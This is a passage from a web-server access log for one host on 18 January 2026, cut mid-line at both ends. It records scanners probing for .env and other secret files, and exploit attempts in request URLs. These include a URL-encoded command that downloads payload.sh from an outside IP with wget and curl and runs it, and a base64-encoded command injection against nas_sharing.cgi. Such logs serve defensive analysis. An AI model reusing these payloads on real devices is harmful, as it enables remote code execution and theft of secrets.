78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0(Linux/3.4.5; U; Android 4.4.2; zh-cn; Lenovo A536 Build/KOT49H)AppleWebKit/534.30 (KHTML, like Gecko) Version/4.4.2 Mobile Safari/534.30 Release/01.17.2014" "-" +[18/Jan/2026:18:31:18 +0000] 404 - GET http 91.82.83.208 "/boot/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Opera/7.52 (Windows NT 5.1; U) [en]" "-" +[18/Jan/2026:18:31:18 +0000] 404 - GET http 91.82.83.208 "/run/.env" [Client 78.153.140.177] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; fr-fr) AppleWebKit/125.5.5 (KHTML, like Gecko) Safari/125.11" "-" +[18/Jan/2026:18:31:18 +0000] 404 - GET http 91.82.83.208 "/proc/.env" [Client 78.153.140.177] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3; Tablet PC 2.0)" "-" +[18/Jan/2026:18:34:06 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:18:36:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:18:43:51 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:18:47:19 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.38] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:18:48:40 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:18:51:17 +0000] 200 - GET http 91.82.83.208 "/" [Client 34.238.233.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36" "-" +[18/Jan/2026:18:56:08 +0000] 404 - GET http 91.82.83.208 "/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=ZWNobwktZQlcXHg2NVxceDYzXFx4NjhcXHg2ZlxceDIwXFx4NTJcXHg2NVxceDczXFx4NTdcXHg2MVxceDczXFx4NDhcXHg2NVxceDcyXFx4NjV8c2g=" [Client 5.181.188.219] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[18/Jan/2026:18:56:56 +0000] 200 - GET http www.pornhub.com "/" [Client 43.250.53.36] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" "-" +[18/Jan/2026:19:08:51 +0000] 400 - GET http 91.82.83.208 "/" [Client 147.182.231.125] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[18/Jan/2026:19:08:52 +0000] 400 - GET http 91.82.83.208 "/t4" [Client 147.182.231.125] [Length 252] [Gzip -] "Mozilla/5.0" "-" +[18/Jan/2026:19:08:52 +0000] 400 - GET http 91.82.83.208 "/favicon.ico" [Client 147.182.231.125] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[18/Jan/2026:19:20:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:19:21:49 +0000] 400 - - http localhost "-" [Client 82.147.84.38] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:19:26:18 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:19:32:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:19:39:43 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:19:42:14 +0000] 404 - GET http 91.82.83.208 "/developmentserver/metadatauploader" [Client 20.65.219.131] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[18/Jan/2026:19:47:16 +0000] 200 - GET http 91.82.83.208 "/" [Client 20.118.240.71] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[18/Jan/2026:19:49:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[18/Jan/2026:19:55:28 +0000] 404 - POST http 91.82.83.208 "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20busybox%20rm%20bbc%3B%20busybox%20wget%20http%3A%2F%2F78.142.18.92%2Fpayload.sh%3B%20-O-%20%7Csh%3B%20curl%20-O%20http%3A%2F%2F78.142.18.92%2Fpayload.sh%3B%20chmod%20777%20payload.sh%3B%20chmod%20%2Bx%20payload.sh%3B%20sh%20payload.sh" [Client 78.142.18.92] [Length 122] [Gzip 1.35] "Mozila/5.0" "-" +[18/Jan/2026:20:02:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:20:04:02 +0000] 405 - POST http 91.82.83.208 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[18/Jan/2026:20:06:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:20:08:43 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux i686 (x86_64)) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 OPR/45.0.2552.898" "-" +[18/Jan/2026:20:08:43 +0000] 404 - GET http 91.82.83.208 "/admin/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36" "-" +[18/Jan/2026:20:08:43 +0000] 404 - GET http 91.82.83.208 "/api/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0)" "-" +[18/Jan/2026:20:08:43 +0000] 404 - GET http 91.82.83.208 "/app/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0" "-" +[18/Jan/2026:20:08:43 +0000] 404 - GET http 91.82.83.208 "/backend/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Linux i686) AppleWebKit/534.34 (KHTML, like Gecko) QupZilla/1.2.0 Safari/534.34" "-" +[18/Jan/2026:20:08:43 +0000] 404 - GET http 91.82.83.208 "/demo/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:53.0) Gecko/20100101 Firefox/53.0" "-" +[18/Jan/2026:20:08:43 +0000] 404 - GET http 91.82.83.208 "/dev/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Gregarius/0.5.2 ( http://devlog.gregarius.net/docs/ua)" "-" +[18/Jan/2026:20:08:44 +0000] 404 - GET http 91.82.83.208 "/staging/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_4_11; fr) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16" "-" +[18/Jan/2026:20:08:44 +0000] 404 - GET http 91.82.83.208 "/mail/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0.1; SM-S327VL Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Mobile Safari/537.36" "-" +[18/Jan/2026:20:08:44 +0000] 404 - GET http 91.82.83.208 "/m/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/85.7 (KHTML, like Gecko) Safari/85.7" "-" +[18/Jan/2026:20:08:44 +0000] 404 - GET http 91.82.83.208 "/remote/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/41.0.7" "-" +[18/Jan/2026:20:08:44 +0000] 404 - GET http 91.82.83.208 "/webmail/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Maxthon/4.4.7.1000 Chrome/30.0.1599.101 Safari/537.36" "-" +[18/Jan/2026:20:08:44 +0000] 404 - GET http 91.82.83.208 "/server/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0" "-" +[18/Jan/2026:20:08:45 +0000] 404 - GET http 91.82.83.208 "/vpn/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 4.4.2; en-us; SAMSUNG SM-N900 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Mobile Safari/537.36" "-" +[18/Jan/2026:20:08:45 +0000] 404 - GET http 91.82.83.208 "/secure/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; rv:8.0; en_us) Gecko/20100101 Firefox/8.0" "-" +[18/Jan/2026:20:08:45 +0000] 404 - GET http 91.82.83.208 "/shop/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Opera/9.62 (X11; Linux i686; U; pt-BR) Presto/2.1.1" "-" +[18/Jan/2026:20:08:45 +0000] 404 - GET http 91.82.83.208 "/cloud/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9b3pre) Gecko/2008011321 Firefox/3.0b3pre" "-" +[18/Jan/2026:20:08:45 +0000] 404 - GET http 91.82.83.208 "/portal/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:14.0; ips-agent) Gecko/20100101 Firefox/14.0.1" "-" +[18/Jan/2026:20:08:45 +0000] 404 - GET http 91.82.83.208 "/host/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36 OPR/35.0.2066.37" "-" +[18/Jan/2026:20:08:45 +0000] 404 - GET http 91.82.83.208 "/support/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.0; SM-G900V Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.76 Mobile Safari/537.36" "-" +[18/Jan/2026:20:08:45 +0000] 404 - GET http 91.82.83.208 "/pop/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.0.4; es-es; GT-P7500 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[18/Jan/2026:20:08:46 +0000] 404 - GET http 91.82.83.208 "/store/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13" "-" +[18/Jan/2026:20:08:46 +0000] 404 - GET http 91.82.83.208 "/cdn/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 AOL/9.7 AOLBuild/4343.4043.US Safari/537.36" "-" +[18/Jan/2026:20:08:46 +0000] 404 - GET http 91.82.83.208 "/dashboard/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0) Gecko/20100101 Firefox/70.0" "-" +[18/Jan/2026:20:08:46 +0000] 404 - GET http 91.82.83.208 "/test/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; SM-T217S Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[18/Jan/2026:20:08:46 +0000] 404 - GET http 91.82.83.208 "/smtp/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36 OPR/37.0.2178.54" "-" +[18/Jan/2026:20:08:46 +0000] 404 - GET http 91.82.83.208 "/ftp/.env" [Client 78.153.140.203] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0.1; SM-J327P Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.111 Mobile Safari/537.36" "-" +[18/Jan/2026:20:08:46 +0000] 404 - GET http 91.82.83.208 "/wiki/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7.5) Gecko/20041109 Firefox/1.0" "-" +[18/Jan/2026:20:08:47 +0000] 404 - GET http 91.82.83.208 "/help/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; pt-BR; rv:1.8) Gecko/20051111 Firefox/1.5" "-" +[18/Jan/2026:20:08:47 +0000] 404 - GET http 91.82.83.208 "/blog/.env" [Client 78.153.140.203] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/602.1.25 (KHTML, like Gecko) Version/9.1.1 Safari/601.6.10" "-" +[18/Jan/2026:20:12:24 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:20:19:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:20:22:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 178.115.231.109] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:20:25:03 +0000] 404 - GET http 91.82.83.208 "/.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0.1; LGLS755 Build/MXB48T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36" "-" +[18/Jan/2026:20:25:03 +0000] 404 - GET http 91.82.83.208 "/core/.env.save" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0_1 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A525 Safari/8536.25" "-" +[18/Jan/2026:20:25:04 +0000] 404 - GET http 91.82.83.208 "/docs/.env.conf" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36" "-" +[18/Jan/2026:20:25:04 +0000] 404 - GET http 91.82.83.208 "/kyc/.env.local" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" "-" +[18/Jan/2026:20:25:04 +0000] 404 - GET http 91.82.83.208 "/core/.env.smtp" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; ZTE_N9511 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[18/Jan/2026:20:25:04 +0000] 404 - GET http 91.82.83.208 "/core/.env.test" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:41.0) Gecko/20100101 Firefox/41.0" "-" +[18/Jan/2026:20:25:04 +0000] 404 - GET http 91.82.83.208 "/mail/.env.conf" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_7; en-us) AppleWebKit/534.20.8 (KHTML, like Gecko) Version/5.1 Safari/534.20.8" "-" +[18/Jan/2026:20:25:04 +0000] 404 - GET http 91.82.83.208 "/docs/.env.prod" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3" "-" +[18/Jan/2026:20:25:04 +0000] 404 - GET http 91.82.83.208 "/logs/temp/.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)" "-" +[18/Jan/2026:20:25:05 +0000] 404 - GET http 91.82.83.208 "/env/config.log" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; ja-JP; rv:1.9.1.8) Gecko/20100216 Fedora/3.5.8-1.fc12 Firefox/3.5.8" "-" +[18/Jan/2026:20:25:05 +0000] 404 - GET http 91.82.83.208 "/docs/.env.save" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 (.NET CLR 3.5.30729)" "-" +[18/Jan/2026:20:25:05 +0000] 404 - GET http 91.82.83.208 "/docs/.env.smtp" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.130 Safari/537.36" "-" +[18/Jan/2026:20:25:05 +0000] 404 - GET http 91.82.83.208 "/download/.env~" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 3.2.1; en-us; LePanII Build/HTK75) AppleWebKit/534.13 (KHTML, like Gecko) Version/4.0 Safari/534.13" "-" +[18/Jan/2026:20:25:05 +0000] 404 - GET http 91.82.83.208 "/django/env.php" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (iPod touch; CPU iPhone OS 9_3_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13G34 Safari/601.1" "-" +[18/Jan/2026:20:25:05 +0000] 404 - GET http 91.82.83.208 "/django/env.yml" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.0; WOW64; rv:20.0) Gecko/20100101 Firefox/20.0" "-" +[18/Jan/2026:20:25:05 +0000] 404 - GET http 91.82.83.208 "/crm/.env.local" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0" "-" +[18/Jan/2026:20:25:05 +0000] 404 - GET http 91.82.83.208 "/docs/.env.test" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" +[18/Jan/2026:20:25:06 +0000] 404 - GET http 91.82.83.208 "/crm/config.env" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.0.11) Gecko/20070312 Firefox/1.5.0.11" "-" +[18/Jan/2026:20:25:06 +0000] 404 - GET http 91.82.83.208 "/cron/.env.dist" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 OPR/51.0.2830.26" "-" +[18/Jan/2026:20:25:06 +0000] 404 - GET http 91.82.83.208 "/node/.env.dist" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.155 Safari/537.36" "-" +[18/Jan/2026:20:25:06 +0000] 404 - GET http 91.82.83.208 "/nextjs/env.yml" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 9; SM-G960F Build/PPR1.180610.011; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/74.0.3729.157 Mobile Safari/537.36" "-" +[18/Jan/2026:20:25:06 +0000] 404 - GET http 91.82.83.208 "/nextjs/env.php" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.82 Safari/537.36 OPR/35.0.2066.37" "-" +[18/Jan/2026:20:25:06 +0000] 404 - GET http 91.82.83.208 "/express/env.py" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SCH-I605 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30" "-" +[18/Jan/2026:20:25:07 +0000] 404 - GET http 91.82.83.208 "/database/.env~" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53" "-" +[18/Jan/2026:20:25:07 +0000] 404 - GET http 91.82.83.208 "/dev/.env.local" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0" "-" +[18/Jan/2026:20:25:07 +0000] 404 - GET http 91.82.83.208 "/new/.env.local" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux x86_64; cs-CZ; rv:1.9.2.10) Gecko/20100915 Ubuntu/10.04 (lucid) Firefox/3.6.10" "-" +[18/Jan/2026:20:25:07 +0000] 404 - GET http 91.82.83.208 "/myproject/.env" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_5) AppleWebKit/537.76.4 (KHTML, like Gecko) Version/6.1.4 Safari/537.76.4" "-" +[18/Jan/2026:20:25:07 +0000] 404 - GET http 91.82.83.208 "/dev/.env.stage" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (X11; U; Linux i686; rv:1.7.3) Gecko/20040914 Firefox/0.10.1" "-" +[18/Jan/2026:20:25:08 +0000] 404 - GET http 91.82.83.208 "/gitlab-ci/.env" [Client 78.153.140.224] [Length 552] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36 OPR/38.0.2220.41" "-" +[18/Jan/2026:20:25:08 +0000] 404 - GET http 91.82.83.208 "/dev/.env.token" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Android 6.0; Mobile; rv:51.0) Gecko/51.0 Firefox/51.0" "-" +[18/Jan/2026:20:25:08 +0000] 404 - GET http 91.82.83.208 "/dev/.env_1.bak" [Client 78.153.140.224] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/523.12 (KHTML, like Gecko) Version/3.0.4 Safari/523.12" "-" +[18/Jan/2026:20:26:28 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.18] [Length 1033] [Gzip -] "-" "-" +[18/Jan/2026:20:27:21 +0000] 404 - POST http 91.82.83.208 "/boaform/admin/formLogin" [Client 143.110.192.43] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://91.82.83.208:80/admin/login.asp" +[18/Jan/2026:20:27:22 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 143.110.192.43] [Length 0] [Gzip -] "-" "-" +[18/Jan/2026:20:27:55 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:20:38:40 +0000] 200 - GET http profibot.direct.quickconnect.to "/" [Client 136.113.31.82] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CMS-Checker/1.0; +https://example.com)" "-" +[18/Jan/2026:20:47:20 +0000] 404 - POST http 91.82.83.208 "/goform/formJsonAjaxReq" [Client 91.224.92.14] [Length 150] [Gzip -] "Go-http-client/1.1" "http://91.82.83.208:80/home.asp" +[18/Jan/2026:20:52:44 +0000] 200 - GET http 91.82.83.208 "/" [Client 43.166.132.142] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[18/Jan/2026:20:54:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:21:03:11 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:21:16:12 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:21:18:25 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:21:20:04 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[18/Jan/2026:21:25:47 +0000] 200 - GET http 91.82.83.208 "/?XDEBUG_SESSION_START=phpstorm" 